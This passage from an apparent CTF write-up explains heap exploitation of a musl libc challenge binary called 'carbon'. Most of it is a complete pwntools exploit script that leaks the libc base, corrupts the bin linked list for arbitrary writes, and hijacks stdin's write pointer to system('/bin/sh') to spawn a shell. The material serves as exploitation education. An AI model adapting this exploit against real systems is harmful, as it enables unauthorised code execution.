If the program does not enable PIE, the address length of the data segment is 24 bits ( 0~0x2000000), and the memory location is 0xBADBEEFrelatively close. If the brkpointer is modified to 0xBADBEEF - n, the brk system call will extend the data segment to 0xBADBEEFmake it an accessible memory address.

edit(binmap,  'X' * 16 + p64(0))
edit(brk,     p64(0xbadbeef - 0x20))

add(0) # 0xbadbeef 

Set mal.binmapto NULL, brkset 0xbadbecf, and then add(0)allocate a 0x20 byte chunk, and finally get it 0xBADBEEF.

Note that the mal.binmapfake chunk needs to be constructed in the previous place to prevent the original binmapvalue from being destroyed .

4.5 Using scripts

The exploit Python script is as follows:

#!/usr/bin/env python2
from pwn import *
import sys

context(arch="amd64", log_level="debug")

if len(sys.argv) >= 3:
    p = remote(sys.argv[1], sys.argv[2])
else:
    p = process("./carbon")

def alloc(sz, ctx='n', ans='N'):
    p.sendlineafter(">", '1')
    p.sendlineafter("What is your prefer size? >", str(sz))
    p.sendlineafter("Are you a believer? >", ans)
    p.sendafter("Say hello to your new sleeve >", ctx)

def free(idx):
    p.sendlineafter(">", '2')
    p.sendlineafter("What is your sleeve ID? >", str(idx))

def edit(idx, ctx):
    p.sendlineafter(">", '3')
    p.sendlineafter("What is your sleeve ID? >", str(idx))
    p.send(ctx)

def view(idx):
    p.sendlineafter(">", '4')
    p.sendlineafter("What is your sleeve ID? >", str(idx))
    return p.recvuntil("Done.", True)

alloc(0x1, 'A') #0

libc_base = u64(view(0).ljust(8, 'x00')) - 0x292e41

info("libc base: 0x%x", libc_base)
stdin   = libc_base + 0x292200
binmap  = libc_base + 0x292ac0
brk     = libc_base + 0x295050
bin     = libc_base + 0x292e40
system  = libc_base + 0x42688

# 1. construct fake chunks
alloc(0x10) #1
alloc(0x10) #2, prevent consolidation
alloc(0x10) #3
alloc(0x10) #4, prevent consolidation
alloc(0x10) #5
alloc(0x10) #6, prevent consolidation
alloc(0x10) #7
alloc(0x10) #8, prevent consolidation

free(1)
free(3)

payload  = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(stdin - 0x10) * 2
payload += p8(0x20)
payload += 'n'

alloc(0x10, payload, 'Y')   #1
alloc(0x10)                 #3
free(1) # set as non-empty bin

edit(3, p64(binmap - 0x20) * 2)
alloc(0x10)             #1
free(5) # set as non-empty bin

edit(3, p64(brk - 0x10) * 2)
alloc(0x10)             #5
free(7) # set as non-empty bin

# 2. corrupt bin head and get arbitrary pointers
edit(3, p64(bin - 0x10) + p64(stdin - 0x10))
alloc(0x10) #7
alloc(0x50) #9

edit(3, p64(bin - 0x10) + p64(brk - 0x10))
alloc(0x10) #10
alloc(0x50) #11

edit(3, p64(bin - 0x10) + p64(binmap - 0x20))
alloc(0x10) #12
alloc(0x50) #13

# 3. corrupt stdin, binmap and brk
payload  = "/bin/shx00"    # stdin->flags
payload += 'X' * 0x20
payload += p64(0xdeadbeef)  # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead)  # stdin->wbase
payload += 'X' * 8
payload += p64(system)      # stdin->write

edit(9, payload) # stdin
edit(11, p64(0xbadbeef - 0x20) + 'n')  # brk
edit(13, 'X' * 0x10 + p64(0) + 'n')    # binmap

# 4. get shell
p.sendlineafter(">", '1')
p.sendlineafter("What is your prefer size? >", '0')

p.interactive() 

 

5. Summary

This article shows how to use the heap overflow vulnerability to hijack the header of the bin linked list in the musl libc environment, modify the linked list pointer through unbin to achieve arbitrary address writing, and finally get the shell through FSOP. In addition, it also introduces the general implementation of the musl libc heap manager, the method of malloc returning any heap address, the error of the question, and the repair method.

 

6. Reference

  1. musl libc source code (Github mirror)
  2. mmap help documentation
  3. Implementation of mmap address randomization
  4. brk help document
  5. brk address randomization implementation